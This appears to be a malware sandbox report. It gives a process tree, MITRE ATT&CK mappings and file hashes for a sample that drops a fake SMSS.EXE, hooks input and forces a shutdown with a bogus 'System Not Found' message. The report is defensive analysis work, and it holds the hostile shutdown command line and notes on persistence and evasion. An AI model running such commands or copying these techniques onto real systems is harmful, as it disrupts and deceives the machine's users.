C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:3308
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2060 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:3764
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4944
-
-
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4572
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3928
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3712
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:3308
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1Change Default File Association
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1Change Default File Association
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
2Disable or Modify Tools
2Modify Registry
8Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD5c2dad8cd19a2061f9cb152b36e261c80
SHA150947e9db21f3e7b7efb9d3cd43738aa75e30eb1
SHA256f0dc94736036677e97071d44a5b954bc6c11f0ae13a00aa31ab854d8aa583845
SHA512b8e264a77440d4d943dc5b493cb8e2364f457a83534f346381709e90d714df13170d410dbcb5c45a189491e858e7ec5f59f254814b4b2a3aeb36ea050c47067e
-
Filesize
70KB
MD552f13d5f1e062562a89ab6a7d20f45a2
SHA1faed88a0c1d882f80d46efab59db82657345d3e5
SHA25666b3300b84802ab3446fc69350f66537b808bdec219ca025b1a6d6d6fc31bfcb
SHA512cc987626e6e066ddf113c3663a9e2f9aecc59eec452de996665c1358a289affd821872e4969763049b8847806978c6deaa0df0347ad0b86f1bfc0486d51879a7
-
Filesize
70KB
MD55d8b71df1f0fc372df4d18c3b278cd72
SHA103a0f3e60c9caaaab771c4e4e749b922dbdb5f98
SHA256c14ac0df3eb141ee06ac985f944a446d2f5eb501ea8701b977617358262ae218
SHA512b0be124d27aef723c8558c01255361ea4ddcdcd4c6299fb59420aba13aa16c4273ecb8c16b62830ec69215b1ecdf328537a2c4c214332336ad51921c9aca1dd9
-
Filesize
70KB
MD50f04263db021b2e40d767ae8891f9ba7
SHA1e1dc312cdbecacfd1fba0ebfeca71231a238ace4
SHA256f12e676fa16a354d8495b6076c503361d16ac318f97c1e3362d352d63f5189e3
SHA5128648fd2146d6eef778415145d8c18cfad6ecb0c663cc7617d2179382c13b11b046a23f445b42dfb487c3cee5d2d58d21e19f57530fd1fafb2052df871014e12b
-
Filesize
70KB
MD51435ec2300ca23bb8eb38a700c73e98c
SHA116f065576c78fd402ee18888c4c2038e212423bb
SHA2563d63c957c6bef0646842f6b52194a66844357a2ce898124a30373174a9e84bc0
SHA5124d85ddd2a2bd8b92f69053ebb5be3a867fe87a53b5eb7486501643be80c00a475c71aa42277b3e0f6ff71d74946c98f65fcfa8f7041c40fc8e47dea39d92e77e
-
Filesize
70KB
MD5277614c6e6f0f7b86381b5db63434e92
SHA12ffe34be1da219689cf710936a0962aafb3360e2
SHA2567caaec03349b42bf40edf3e08fefb5b422ad90bb63dd2fe80c339ffc9306d7c7
SHA5122ced2995b43f5c9f09b4ca9c978be0541f9cfd2124c25ffe7dd135d6b478a82091226ec62eefae0d0a8b891e7c7f25e08f892b4bfc5e608c0b6f15334759a470
-
Filesize
70KB
MD54857ebb09c526f3c9f73abda3a42e8a6
SHA137ba2a3bf091c5cf52e7d59c96b5a5def2b3cf12
SHA2562e8f6e96191d494335f9115c7f45136928d2a15d28493b4dde9b4b39c82b3538
SHA51263cd432752b631c3e11b799aeec26d03d162c53448f2e15ce5a349f14fb4b2f365037bb080ab5aebbeb33e1c985000beec8207eab1bc5075cdd7a1c6733e2831
-
Filesize
70KB
MD5473012b1fafd77fd846773c4225de605
SHA1e62849be31456f3193ca8d25d089aa8c0e9fafa7
SHA256e5f5795a9d923a53106c91a1123f8e3efc7fd9a0884db3b85349d8e7d4a6f920
SHA512d6543021e77377d9be48007b08f1c6985e1afae6cc897c334311d1bfd6a02d25f76ba0cf5795f66d715ad79f5e57dcbb046ce27b3382c2e2e639839b556592eb
-
Filesize
70KB
MD5dee0b6b16ec7d37df16656b72bbf236e
SHA1915ad1d16be9bceac4fe04b2b0a2dcc903dbd1f0
SHA256b2bb288750d807cc98bdd3c563e2b61d60b8a0255c0e7f949227fe403d525658
SHA5121ea831a680247e4d17a18a3784f4f733d6d60fad435f335e487ad69a2194195ae16c381154256691cb3d30e5142899f08780552464c5b50cf29868ef92b5612f
-
Filesize
1KB
MD56635e047c242e6d64b2716d81095bf5f
SHA15def5300f894e58bbb0caaa94680f7735ccd248d
SHA2569757b4f406657c44fcbd40757d1ae06e833a8e1542ca976e6ae63578031b32bf
SHA512c9bae9bf090e7c67fac53d061bb43c2091e991c8f568889463d0c1af8f48652c79c51785c0906705098b418b2d7a4b200580fb44091ecf8bf24d8b1b45a258c0
-
Filesize
1KB
MD5e067dafcbe64a95f5045a281397732db
SHA11af7095f98c486ca247449980000d06b04ffc50c
SHA256b6085ee8c1f2de574973b9f3a7417257e25573c2b5228b5a8f87e3788e2733b6
SHA5121b575d62fee219538f8d624ab833cbce0aee431559a0adfa1e3ce9cd4f5ab8a2887b394843ebf164c884ccbed5687d644474328471b23c28edba8f99ccf08b58
-
Filesize
70KB
MD566a474002037e8cb85bb7ddcd6d1a88f
SHA1782efd88c157ca3ed77c582731ecc75ca3787caa
SHA25697ac843287e734bdbbb0d08730982b06847862f42fdada4a0497b6c79e4c75b9
SHA512625d0017f69a8aaea9fe3088cb24b6c262907a3ecd0907fa50ed35b559c34ffb3a46dc382b02129c7647d0c2380dc053a14e7482f25ebf337397113ea604af9a
-
Filesize
70KB
MD53515c7ddd0cb41c66bf2b90b1dc5483c
SHA1cf1ff1a4f3bf932c9c979bd20f4dc67957e79cdf
SHA256ac2315458f18bdbb71251cc985e6849dcf8ed1b45c53571c1830a8941624bdc4
SHA512b960f460610a4349f9ad79b7ccf6194d9a187445e879d8edd2d69c6aeaaf68a65feb62ad314b7e602850a72726440207663e135911be9db6e53e52b27662fa60
-
Filesize
70KB
MD569d811e5f9265b2c3eccfc39c9597938
SHA156ad7a089a5e2031f157e4fca2d71310b02a230e
SHA2569dc6bdb598a14dd1434c2c6d47aa5e964ae80e7cee8a1bb4ddfac8c002a6c02e
SHA512db01289226fbda920f5455d0e5c1afbfcc54685a82bfb3c64c147bee43e94a2fee83a105c995360f15844a43f56a173a8728df865cbb7a084b93e080fded5331
-
Filesize
70KB
MD5ecae673d3b7831716af86a8886654184
SHA11ce431abcd9a370211cb4c7912879d41a640705e
SHA256698ac72e4438d65b979c880ec3d394c63f33e0206b7d6274091074aa04757ae2
SHA5120421da35f5dd4efe7473b7ced9cf061fe12b121eda52d2f03b158ac333905f12a469c6fb3cf7a9078b73c72a32876632143f2a2e2b15fbd1ac730357bbfb622e
-
Filesize
70KB
MD531cf1bc9357c8bfc496951f3c6b2f1d4
SHA146e43ddc6a17bcda9f43a1e37404e47dd0950c37
SHA25600c3cd6220170d19cc3d8502084d07bab79b68c6b11f36624d0bddf502522295
SHA5125597b77c335c2e3e925285f7bc445f6f43b36010dc5fa12cc47824fc3d6ba1c8a64e4fd1ff6013ff783d2ce557c28ec7d0fd0e228c3fdba59d56dd87eb2658bf
-
Filesize
70KB
MD56d93a9ba850363e4f3d27a1b9b53cae7
SHA1a02a8804d6e5d6b2640f4678603a3190ff9c5915
SHA2563bdee662b5d0224f43ddcda09189658a76cc01662c9d0550ee499be55d2b9d51
SHA512ac8544a3eac5ef361fee4e077a0531306c2c48f9dcc6ba739c02e6dbbfdf17e7f640b3cffd17a3329997228434ed583c898061bba219d67f4d02687399809cf2
-
Filesize
70KB
MD52fd685a44814d363e81a07de7bee5233
SHA1a9170c0738cf9f0d746ff409907f13a93f0baf04
SHA256d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c
SHA5125bfddc19d55b0377410e1681de30336956f9f9f59b26f8237863079b7b0df0d05aec773ea5e3045dba3b5bed4109b536c75a171d356494285a8a5dd498c87bf5
-
Filesize
70KB
MD539bd810987ba65e42a955cb955d480bc
SHA145251b9d7da24ac60fd7e3ea2b3b7d902bcdee6e
SHA25687b24d48f1f57173b3a0ad20886726049a213cbd030682b007450686409999a3
SHA51297c8dd1b9488e9ec28c1c32600156f7846187013e38694e1316dec3052c7eaa72b6499c27294478b2ed11570a171ca08bd61d71315029c8b1792c7bfb1bef6ce
-
Filesize
70KB
MD58b855b20db6eb57ba796a8e7501572f7
SHA142953ed73121b53c873019bbf071910b62065467
SHA256fcd8fb6c69fdac330da0616413ee15676307716d28bcefc52832c3e6ec368ddc
SHA512c5966455eb6db3e0d2b194d8211bf4b9cccee9a47c49074958c80f6c467e1ff4bdbd3b867febb87b232e5fdb2cea450adb3f5ea7a46f11c1b92c507482ad28e4
-
Filesize
1.4MB
MD525f62c02619174b35851b0e0455b3d94
SHA14e8ee85157f1769f6e3f61c0acbe59072209da71
SHA256898288bd3b21d0e7d5f406df2e0b69a5bbfa4f241baf29a2cdf8a3cf4d4619f2
SHA512f4529fd9eca4e4696f7f06874866ff98a1447a9b0d3a20ef0de54d4d694e2497fd39c452f73fab9b8a02962a7b2b88d1e85f6e35c7cbcb9555003c6828bebc3a
-
Filesize
93B
MD54809daf962803cad2b891b94c195d3dd
SHA1707bdd28edcf5e9e288959f62d4da8823777ec12
SHA2563468667630714eb86464ecfe903b59a843670ade55b49ac9d653421b91bcf139
SHA512c9c233b22a853ce17731cb3466f7e8234da4e3de0dec6cc48ed15232303d4f29c49770e20a7064ad9329f8d9d27f8d4b547443d837320f58ac230973bb7dd11f
-
Filesize
70KB
MD5a7337a8f176b77efa8a8fabb224e054c
SHA12fb4ed8c63758f276963e82e73130be3c5613c26
SHA256f63a282980928aabc7cc02edfde5bed1fa86b13a1365c000a61d44864dbdf604
SHA512fff2fb8eef0c9ec05975345ad2ebc59038df004965813fe398c3f85159eb622d65557debe350378efee5c94af6c85aa7fd95ef96d2f8d902ac61a5e8abdc2c09
-
Filesize
3KB
MD55c462f1ea2917c0b502ae0761c0f60d8
SHA1c1d15b093b2843528544d77dc0d9d4e3b8a85297
SHA25609c76898e4fa4174c53c2ad514274b5d2ca636ec6f223be5fda4c6135ec4ac10
SHA512e6219ccbabe77a4999ade79c7074753495da9c61d6451c53be34219cc19746ca9a0dadef3b47cd8859cd59604064af5e9fc2a5044780bcfebaaa13dc08c36bbc